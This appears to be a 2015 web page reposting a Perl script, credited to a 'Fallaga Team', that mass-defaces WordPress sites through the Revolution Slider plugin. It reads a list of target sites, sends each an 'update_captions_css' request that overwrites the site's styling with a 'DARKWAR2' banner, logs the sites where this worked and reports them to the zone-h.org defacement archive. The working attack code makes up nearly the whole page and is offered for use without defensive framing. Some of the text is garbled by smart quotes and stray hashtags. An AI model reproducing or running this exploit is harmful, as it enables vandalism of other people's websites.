WordPress Revslider Perl Exploit

#!/usr/bin/perl
‪#‎mass‬ revslider defacer coded by Fallag Gassrini tunisian Fallaga Team
‪#‎Don‬‘t Change Right Thats Wont make U Da Real Coder
# Al Fallaga ©
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent(“Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)”);
$ua->timeout (10);
print ” Mass Defacer By Fallag Gassrini tunisian Fallaga Team n”;
print ” Path to your websites list:”;
my $list=<STDIN>;
chomp($list);
open (THETARGET, “<$list”) || die “[-] Can’t open the Website list !”;
@TARGETS = <THETARGET>;
close THETARGET;
$link=$‪#‎TARGETS‬ + 1;
foreach $site(@TARGETS){
chomp $site;
if($site !~ /http:///) { $site = “http://$site/”; };
$ajx = $site . ‘wp-admin/admin-ajax.php’;
$link = $site .’wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css’;
print “Scaning $siten”;
$gassface = POST $ajx, [
‘action’ => ‘revslider_ajax_action’, ‘client_action’ => ‘update_captions_css’, ‘data’ =>”
<body style=’color: transparent;background-color: black’><center><h1><b style=’color: white’><center><br>DARKWAR2<p style=’color: transparent’>”];
$response = $ua->request($gassface);
$stat = $response->content;
if ($stat =~ /true/){
print colored (“[+]Exploit Success!!”,’white on_red’),”n”;
print “[+]$linkn[+]Wait Zone-H…n”;
zonpost();
open(save, ‘>>1453.txt’);
print save “$linkn”;
close(save);
}else{
print colored (“[-]Exploit Failed!!”,’white on_blue’),”n”;
}
}
sub zonpost{
$req = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($req);
$ar = $response->content;
if ($ar =~ /Hacked|DARKWAR2|DARKWAR2/){
$dmn= $link;
$def=”DARKWAR2″;
$zn=”http://zone-h.org/notify/single“;
$lwp=LWP::UserAgent->new;
$res=$lwp -> post($zn,[
‘defacer’ => $def,
‘domain1’ => $dmn,
‘hackmode’ => ’15’,
‘reason’ => ‘1’,
‘submit’ => ‘Send’,
]);
if ($res->content =~ /color=”red”>(.*)</font></li>/) {
print colored (“[-]submit $1″,’white on_green’),”n”;
}
else
{
print colored (“[-]Error”,’black on_white’),”n”;
}
}else{
print” Not Defaced Gass !! n”;
}
}
168 Okunma 17 Nis 2015

Yorumlar


Sen de Yorumla!